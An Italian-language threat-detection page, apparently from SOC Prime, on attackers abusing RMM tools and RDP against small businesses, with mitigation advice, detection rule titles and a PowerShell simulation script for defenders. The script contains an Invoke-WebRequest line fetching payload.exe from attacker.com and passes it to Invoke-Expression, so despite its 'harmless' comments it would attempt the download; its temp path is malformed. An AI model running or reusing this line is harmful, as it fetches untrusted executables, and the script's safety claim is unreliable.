SOC Prime Bias: Critical

04 Sep 2026 12:58 UTC

Sicurezza RMM per le PMI: Un manuale per il rafforzamento dell’accesso remoto

Author Photo
SOC Prime Team linkedin icon Segui
Sicurezza RMM per le PMI: Un manuale per il rafforzamento dell’accesso remoto
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Gli aggressori stanno sempre più abusando di strumenti legittimi di Remote Monitoring and Management (RMM) e dei Remote Desktop Services (RDS) per stabilire la persistenza e supportare il movimento laterale. Strumenti come ConnectWise ScreenConnect, MeshAgent e VNC possono essere utilizzati come armi tramite lo sfruttamento di vulnerabilità o installatori trojanizzati. Questo crea una sfida significativa per le piccole e medie imprese, dove l’attività malevola può assomigliare strettamente all’amministrazione IT legittima.

Investigazione

L’analisi si basa sulla telemetria di Acronis da oltre 1,8 milioni di endpoint gestiti per valutare i rischi legati a RMM per le PMI e gli MSP. Gli studiosi hanno scoperto che il 63% degli endpoint esegue più strumenti di accesso remoto, ampliando la potenziale superficie di attacco. Lo studio ha classificato il software RMM in tre categorie: strumenti da bloccare, strumenti da monitorare e rafforzare, e strumenti da verificare e mantenere.

Mitigazione

Le organizzazioni dovrebbero disabilitare i servizi RDP non necessari tramite Group Policy, imporre l’autenticazione a livello di rete (NLA) e richiedere MFA per tutti gli account amministratori RMM. La lista di permessi delle applicazioni può aiutare a prevenire installazioni RMM non autorizzate, mentre l’infrastruttura RMM esposta a internet dovrebbe essere patchata prontamente. Il routing dell’accesso remoto attraverso VPN o gateway ZTNA è inoltre raccomandato per rafforzare i controlli di accesso.

Risposta

Quando vengono rilevati strumenti RMM non autorizzati, le organizzazioni dovrebbero immediatamente investigare la loro fonte di installazione e cercare furto di credenziali o movimento laterale correlati. L’attività non autorizzata di MeshAgent dovrebbe essere considerata come una compromissione confermata. La rimozione automatizzata può essere inefficace quando sono presenti meccanismi di persistenza, richiedendo un’escalation alla risposta agli incidenti manuale e un’indagine forense più approfondita.

Flusso di attacco

Stiamo ancora aggiornando questa parte.

Rilevazioni

Software alternativo di Accesso Remoto / Gestione (via process_creation)

SOC Prime Team
04 Set 2026

Possibile Tentativo di Esecuzione di Comando Remoto ScreenConnect (via cmdline)

SOC Prime Team
04 Set 2026

Software alternativo di Accesso Remoto / Gestione (via system)

SOC Prime Team
04 Set 2026

Software alternativo di Accesso Remoto / Gestione (via audit)

SOC Prime Team
04 Set 2026

Uso di PowerShell per Distribuire Malware [Windows Powershell]

Regole AI SOC Prime
04 Set 2026

Rileva Modifiche nella Configurazione RDP per Accesso non Autorizzato [Evento Registro di Windows]

Regole AI SOC Prime
04 Set 2026

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-volo della Telemetria e Baseline deve essere stato superato.

Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.

  • Narrazione e Comandi dell’Attacco: L’avversario ha ottenuto accesso iniziale alla workstation tramite un payload di phishing. Per stabilire la persistenza e il controllo remoto, intende distribuire un Trojan di Accesso Remoto. Esegue una one-liner PowerShell che, pur non scaricando effettivamente un payload in questa simulazione, contiene la stringa di firma AsyncRAT all’interno del blocco di script per simulare la fase di distribuzione di un’installazione di malware. Questo imita un attaccante che utilizza uno script semplice per scaricare il proprio kit di strumenti.

  • Script di Test di Regressione:

    # Script di simulazione per attivare la regola di rilevamento includendo la stringa mirata.
    # Nota: Questa è una simulazione non dannosa progettata solo per produrre telemetria.
    
    $SimulatedMalwareName = "AsyncRAT"
    Write-Host "Inizializzazione della sequenza di distribuzione per $SimulatedMalwareName..."
    
    # Questo blocco simula la logica di un downloader/installatore
    $payload = "Invoke-WebRequest -Uri 'http://attacker.com/payload.exe' -OutFile '$env:TEMPmalware.exe'"
    
    # Esecuzione della stringa per assicurarsi che appaia nel Log del Blocco Script (Evento 4104)
    Invoke-Expression "Write-Output 'Distribuzione di $SimulatedMalwareName...'; $payload"
  • Comandi di Pulizia:

    # Pulizia: Rimuovere eventuali artefatti se fossero effettivamente creati.
    # In questa simulazione, non sono stati effettivamente scaricati file.
    Remove-Item -Path "$env:TEMPmalware.exe" -ErrorAction SilentlyContinue
    Write-Host "Pulizia completata."